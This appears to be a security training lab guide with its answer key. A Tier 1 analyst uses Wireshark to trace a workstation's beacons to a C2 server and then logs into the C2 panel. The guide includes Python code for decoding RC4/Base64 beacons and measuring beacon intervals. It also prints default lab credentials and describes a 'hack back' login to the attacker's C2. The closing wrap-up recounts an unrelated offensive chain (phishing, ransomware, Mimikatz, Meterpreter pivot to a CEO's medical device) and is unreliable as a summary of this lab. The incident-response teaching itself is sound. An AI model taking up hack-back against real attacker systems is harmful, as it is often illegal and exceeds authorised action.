    Value Proposition: We designed the Cyber Defense Response clinic with the goal of demonstrating why various security concepts are important using real world attack and defend scenarios. Our challenge is trying to create an environment that can provide value to people with various levels of skills and experience. The scenarios thus far have followed a script explaining the steps for both the attack and defend exercises. We decided to include one scenario that is scripted differently. In this scenario, you are challenged to come up with your own steps to answer specific questions about an attack that has recently occurred. Consider this an incident response challenge!

    Outcome

    At the end of this scenario, you will have attempted the Cyber Defense Response Challenge by performing an incident response to a recent attack. You will have investigated a Windows system that you were informed may have been infected with some form of malware based on potential communication to a command and control (C2) server. You will have run Wireshark to view packet level traffic between the IT system and outside world.

    Finally, you will have accessed the C2 system, assuming you found something, and investigated how it functions. Anything more, such as the advanced concepts covered in this lab, would require you to escalate this situation to a higher tier team using a formal incident response report. Your goal was to avoid having to do that by handling the situation on your own.

    Lab Resources

    • System potentially Compromised: Windows 7 Workstation known as “IT workstation”

    • Potential Attacker Resource: Unknown outsider

    Many steps you will perform require a lot of manual effort and knowledge about where to start your investigation. Tools such as Cisco Firepower, AMP and Stealthwatch would quickly identify this type of malicious behavior and even automatically remediate it. Remediation could be done with Cisco AMP from a file level or Cisco ISE from a network quarantine approach, as demonstrated earlier in the CDC scenarios.

    The Cyber Defense Challenge

    In this scenario, you are the late-night Tier 1 Cyber Defense Analyst working your normal evening shift. You receive a call informing you that the IT workstation is likely infected due to multiple, unusual alarms. You must figure out if the IT workstation is indeed infected and perform a forensics investigation to answer questions your manager and higher tier will need answered before a formal incident can be documented. If you can handle the incident yourself without escalating to a higher tier, you will be entitled to a sweet bonus, recognition and potential future career enhancement.

    This challenge will follow two parts. The first part is figuring out what is happening with the system using Wireshark to examine communication to and from this system. You will find many basic functions such as opening a command line terminal are being disabled by whatever has infected this system. Bummer!

    The second part of the challenge will be your only approved incident response. In this case, you will be authorized to access any identified malicious source related to this specific incident. Be aware that “hacking back” is illegal in many cases. For this challenge, you are authorized to investigate the malicious sources, depending upon what you find during your investigation.

    When you complete your investigation, write a short explanation of what you think occurred. The Answer Key can be found after the Question section. Challenge yourself by NOT LOOKING at the answer key until you have attempted every question. This is the honor system. Don't cheat yourself! You will find that many of the questions can be answered in multiple ways. Some methods will become obvious when you either attempt to answer a question or view the answer key after finishing your work. Keep in mind that the attack has already occurred and may still be occurring; hence, you are instructed to use Wireshark.

    Have fun and good luck!

    Note: Real-world incident response plans have various levels of support and structure. A company should not invest incident response resources in every event, because that wastes time and money. A formal response should only occur once an incident has been verified as legitimate and as a risk to the organization. This means our challenge isn't a stretch, since your job is to validate that this is a true positive before it becomes a documented incident.
    Important: It is NOT best practice to wipe a system you believe is infected. Wiping destroys the forensic evidence, meaning you will never know how it happened!

    The username for the IT workstation is admin, and the password is C1sco12345.

    CDC Challenge Questions

    The HackMDs SOC requires the following questions to be answered before a formal incident response can be documented. Any documented incident is followed by a formal alert and response program run by the HackMDs forensic unit. This service is very costly and must only be used for real compromises of HackMDs' cyber defenses. Your goal is to avoid alerting the forensic unit by handling the situation with our own limited capabilities. Good luck!

    Set up

    You will find that the infection has limited what can be run from this system. Luckily, Wireshark still seems to function properly. There is only one active interface when you open Wireshark. Let Wireshark run for 1-3 minutes before stopping the capture and seeing what you can find. Make note of any communication between the outside network (198.18.133.0/24) and this workstation. Wireshark display filters will be very helpful (https://firstdigest.com/2009/05/wiresharks-most-useful-display-filters/)

    Procedure


     1   

    Open Wireshark using the icon on the desktop.

     2   

    Click Capture, and then select Options.

     3   

    Select the active interface: click Local Area Connection, and then click Start at the bottom right of the screen.

     4   

    Wait a few minutes (up to about five) for the system to capture traffic. It will not always take that long, but it does take a few minutes to capture all the traffic.

     5   

    Click the red square to stop the capture.


    Part 1: Questions

    Procedure


     1   

    Adversary communicating to infected system IP Address:

     2   

    TCP/UDP ports open:

     3   

    Do you believe the command and control (C2) alarm is a false positive? Why?

     4   

    If the alarm is a true positive, what is the IP address of the C2?

     5   

    What type of communication is taking place from the C2?

     6   

    What is the IP address of the attacker?

     7   

    Is there a potential installed client communicating from the HackMDs network?

     8   

    Where is the potentially compromised IT workstation communicating to?

     9   

    What is the DNS name for the malicious website / C2 if one exists?


    Part 2: Hack Back!

    You are rewarded for your good work. Your peers in the research community have heard of the C2 you identified and know how to access its GUI. Based on threat intelligence, your team lead has provided you with the web location 198.18.133.5/shop/main.php for this attack. The username and password are both admin. You decide to do a little poking around. Answer the following questions about the C2 server.

    In the real world, hacking back is likely illegal, meaning you would probably be breaking the law if you logged into an attacker's C2 system. We show this purely for educational purposes, to illustrate what a C2 system can look like.

    Procedure


     1   

    How many targets have been infected by this attacker?

     2   

    What was the last attack executed by this source that was successful?

     3   

    How many attacks / tasks failed?

     4   

    What is the knock interval?

     5   

    What is the version number of the infection?

     6   

    After the infection file ran, where did it get copied to and what is its name?

    STOP HERE UNTIL YOU FINISH OR NEED TO VIEW THE ANSWER KEY.


    Attack Summary

    Here is one possible path you could have used to discover the answers to the CDC challenge. There are many other methods that would get you similar results.

    • Access to the portal user: admin | password: admin

    • C2 Location: 198.18.133.5

    • Attack details: /var/www/html/shop | written in C++/ASM | Ring3 Rootkit | Communications stream RC4 – to Base64
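    The Attack Summary above states that the C2's communications stream is RC4 encrypted and then Base64 encoded, which is why the POST bodies in the Wireshark capture do not read as plaintext. The following is an added example, not code from the lab or from the C2 itself, showing how an analyst would decode a captured beacon body once the RC4 key has been recovered (for instance from the C2 sources under /var/www/html/shop). The key, the beacon fields and the candidate key list are constructed for this example and are not values taken from the lab.

```python
import base64
import string

def rc4(key, data):
    """RC4 key scheduling plus keystream XOR; encryption and decryption are the same call."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

PRINTABLE = set(string.printable.encode())

def looks_like_plaintext(b, threshold=0.9):
    """Cheap key check: the right RC4 key yields mostly printable bytes, a wrong one yields noise."""
    return bool(b) and sum(c in PRINTABLE for c in b) / len(b) >= threshold

def decode_beacon(body, key):
    """Undo the C2's wrapping: Base64 text on the wire -> RC4 ciphertext -> plaintext fields."""
    return rc4(key, base64.b64decode(body))

def try_keys(body, candidates):
    """Return the first candidate key whose decryption looks like plaintext, else None."""
    for key in candidates:
        if looks_like_plaintext(decode_beacon(body, key)):
            return key
    return None

# Constructed sample: the key and the beacon fields are invented for this example,
# not recovered from the lab's C2.
SAMPLE_KEY = b"sportsfans"
SAMPLE_PLAINTEXT = b"id=1&ver=1.0&os=Windows 7&host=IT-WORKSTATION&cmd=ping&interval=5"
SAMPLE_BODY = base64.b64encode(rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT))

if __name__ == "__main__":
    key = try_keys(SAMPLE_BODY, [b"admin", b"wrong", SAMPLE_KEY])
    print("key:", key, "->", decode_beacon(SAMPLE_BODY, key))
```

    Two points worth remembering from this: Base64 is an encoding, not encryption, so it hides nothing from an analyst; and because RC4 is a symmetric stream cipher, the same routine that the bot uses to encrypt also decrypts, which is why recovering the key from the C2 side is enough to read every beacon in the capture.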

    Part 1: IT Workstation Answers

    Procedure


     1   

    The first thing to do is look for IP addresses on the outside network. To filter for that network, use the display filter ip.addr == 198.18.133.0/24.

     2   

    You should see a large amount of traffic involving 198.18.133.5 and 198.19.30.102. If you open a web browser to each of these IP addresses, 198.18.133.5 brings up an Apache web server.

     3   

    The source of this communication is from inside your network, so now you know the IP address of the infected system.

     4   

    Scroll through the conversation details to see information such as the ports and protocols in use.

     5   

    Scroll and explore within this conversation to find points of interest. For example, there is a POST to /shop/order.php (frame 339).

     6   

    Double-click an entry to reveal even more information. Notice that the Host header is www.sportsfans.atk. It looks like we have a website that something was trying to communicate with. This is very likely the bot installed on the workstation beaconing back to the C2.

     7   

    Browse to www.sportsfans.atk to see the same result as the IP address: the Ubuntu server's default page.

     8   

    Note that if you try to access the full URL found in the capture, it leads to a dead page. We can see that this is likely how the infected IT workstation is communicating with the C2.
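    The Part 1 answers above are found by hand in Wireshark: filter on the outside network, list the ports in use, open the HTTP conversation and read the Host header, and notice that the POSTs repeat at a steady cadence. The script below is an added example, not part of the lab's own material, that performs the same analysis on a saved capture file using only the Python standard library: it reads a classic libpcap file, applies the equivalent of ip.addr == 198.18.133.0/24, extracts method, URI and Host from plaintext HTTP requests, and measures the interval between beacons (which you can later compare with the knock interval shown in the C2's Settings page). The capture it runs on is constructed inline so the script works offline; 198.19.30.102 is assumed to be the infected IT workstation, and the packet timings and the Content-Type line are invented for the sample.

```python
import struct
import ipaddress
from collections import Counter

OUTSIDE = ipaddress.ip_network("198.18.133.0/24")  # the lab's outside network
C2 = "198.18.133.5"                                # C2 address from the answer key
INSIDE_WS = "198.19.30.102"                        # assumed: the infected IT workstation

def parse_pcap(data):
    """Minimal libpcap reader: returns one dict per Ethernet/IPv4 TCP or UDP frame."""
    magic, = struct.unpack("<I", data[:4])
    e = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if e is None:
        raise ValueError("unsupported pcap magic %#x" % magic)
    off, pkts = 24, []
    while off + 16 <= len(data):
        sec, usec, incl, _ = struct.unpack(e + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":     # IPv4 over Ethernet only
            continue
        ihl, total, proto = (frame[14] & 0x0F) * 4, struct.unpack(">H", frame[16:18])[0], frame[23]
        src, dst = (str(ipaddress.ip_address(frame[i:i + 4])) for i in (26, 30))
        l4 = frame[14 + ihl:14 + total]
        if proto == 6 and len(l4) >= 20:                        # TCP: honour the data offset
            name, payload = "tcp", l4[(l4[12] >> 4) * 4:]
        elif proto == 17 and len(l4) >= 8:                      # UDP: fixed 8-byte header
            name, payload = "udp", l4[8:]
        else:
            continue
        sport, dport = struct.unpack(">HH", l4[:4])
        pkts.append({"ts": sec + usec / 1e6, "src": src, "dst": dst, "proto": name,
                     "sport": sport, "dport": dport, "payload": payload})
    return pkts

def outside_traffic(pkts):
    """Same selection as the Wireshark display filter ip.addr == 198.18.133.0/24."""
    return [p for p in pkts if any(ipaddress.ip_address(p[k]) in OUTSIDE for k in ("src", "dst"))]

def http_requests(pkts):
    """Extract method, URI and Host header from plaintext HTTP requests (what the lab
    finds by hand as the POST to /shop/order.php with Host www.sportsfans.atk)."""
    reqs = []
    for p in pkts:
        head = p["payload"].split(b"\r\n\r\n", 1)[0]
        if not head.startswith((b"GET ", b"POST ")):
            continue
        lines = head.split(b"\r\n")
        method, uri = lines[0].split(b" ")[:2]
        host = next((l.split(b":", 1)[1].strip() for l in lines[1:]
                     if l.lower().startswith(b"host:")), b"")
        reqs.append({"ts": p["ts"], "src": p["src"], "dst": p["dst"], "method": method.decode(),
                     "uri": uri.decode(), "host": host.decode()})
    return reqs

def beacon_interval(reqs, src, dst):
    """Median gap between requests from src to dst and the largest deviation from it.
    A bot knocking on its C2 shows a near-constant gap; a person browsing does not."""
    ts = sorted(r["ts"] for r in reqs if r["src"] == src and r["dst"] == dst)
    gaps = sorted(b - a for a, b in zip(ts, ts[1:]))
    if not gaps:
        return None, None
    median = gaps[len(gaps) // 2]
    return median, max(abs(g - median) for g in gaps)

def investigate(data):
    """Answer the Part 1 questions from a capture: C2 address, ports, hostnames, cadence."""
    pkts = outside_traffic(parse_pcap(data))
    reqs = http_requests(pkts)
    c2 = Counter(r["dst"] for r in reqs).most_common(1)[0][0] if reqs else None
    median, jitter = beacon_interval(reqs, INSIDE_WS, c2) if c2 else (None, None)
    return {"c2": c2,
            "infected": sorted({r["src"] for r in reqs}),
            "ports": sorted({(p["proto"], p["dport"]) for p in pkts
                             if ipaddress.ip_address(p["dst"]) in OUTSIDE}),
            "hosts": sorted({(r["host"], r["uri"]) for r in reqs}),
            "knock_interval": median, "jitter": jitter}

# ---- constructed sample capture (not the lab's pcap) so the script runs offline ----
BEACON = (b"POST /shop/order.php HTTP/1.1\r\nHost: www.sportsfans.atk\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n")

def _record(ts, src, dst, proto, sport, dport, payload):
    """One pcap record: Ethernet + IPv4 + TCP/UDP header around payload (checksums left zero)."""
    if proto == 6:
        l4 = struct.pack(">HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    else:
        l4 = struct.pack(">HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                     ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed) + l4
    frame = b"\x00" * 12 + b"\x08\x00" + ip
    return struct.pack("<IIII", int(ts), int(round((ts % 1) * 1e6)), len(frame), len(frame)) + frame

def build_sample_pcap():
    """Five knocks 5 s apart with replies, plus an unrelated internal DNS lookup."""
    recs = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]   # global header
    for i in range(5):
        t = 1000.0 + 5 * i
        recs.append(_record(t, INSIDE_WS, C2, 6, 49152 + i, 80, BEACON))
        recs.append(_record(t + 0.02, C2, INSIDE_WS, 6, 80, 49152 + i,
                            b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"))
    recs.append(_record(1003.0, INSIDE_WS, "198.19.30.10", 17, 53000, 53, b"\x00" * 12))
    return b"".join(recs)

if __name__ == "__main__":
    print(investigate(build_sample_pcap()))
```

    To run it against the real capture, save the Wireshark session as a classic pcap (not pcapng) and pass the file's bytes to investigate(). The internal DNS packet in the sample never reaches the outside network and so is dropped by the filter, which is exactly what the display filter does in Wireshark; the beacon cadence comes out as a 5 second median with zero jitter, the signature of a scripted knock rather than a human.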


    Part 2: C2 Hack Back Answers

    Procedure


     1   

    Open a browser, and then go to www.sportsfans.atk/shop/main.php.

     2   

    Log in with admin for both the user and the password and complete the CAPTCHA question.

     3   

    From the dashboard you can find the answers to each question. Let's start with how many targets have been infected: at the top you can see that only one client is infected. At the bottom you can also see the version number of that infected client, along with other interesting details.

     4   

    What was the last attack executed by this source that was successful? Click Tasks at the top to retrieve a list of what has run. The third column shows that the last item did not fail; hence, it was successful. It is not the most obvious thing to read, but that is how this system was designed.

     5   

    You can see that seven tasks were executed. Since we just determined from the third column that only the last item was successful, we now know that six tasks failed.

     6   

    Next, look at how often the infected system beacons out to the C2 (the "knock interval"). Click Settings to see that it is set to 5.

     7   

    Finally, we need to see where the infection file was installed and what it is named. Click Details next to the infected client, and then scroll down to see more details about the infection.

     8   

    As you scroll down, you see multiple details about the compromised system, including the file installed and where it was installed.

    You were asked to summarize what potentially occurred. It is very likely that someone either downloaded the wrong software or visited a website that identified a vulnerability on this workstation and used it to push software to the system.

    When the software was installed, it beaconed back to the C2, giving a remote party complete access to this computer. The software beacons to the sports fans website, which is obviously a cover for the C2.

    That wraps up the questions you were asked to answer. Feel free to poke around in the C2 GUI to learn more about how it works.

    Congratulations! You have now completed this scenario.


    Wrap Up

    In this lab, you performed a chained exploitation process with the goal of gaining access to an internal medical system that administers medication to CEO Emily Williams. You first needed a foothold within the network, which you obtained with a phishing attack carrying a malicious document. When the victim opened the document, that system (DR) was infected with ransomware as well as a hidden dropper. The ransomware acted as a distraction while you used the dropper to collect data about the DR computer. You used Empire, BloodHound and Mimikatz to find other targets and dump passwords from memory. You eventually upgraded your access to a RAT by installing a Meterpreter on the JUMPHOST. Using Meterpreter, you added a route so that your attack laptop's traffic could be sent through the JUMPHOST to reach the CEO's medical equipment. You used the stolen credentials to access the medical equipment, achieving your desired outcome. Game over for the CEO... unless the HackMDs SOC has something to say about it!

    Well done! You have completed this scenario.
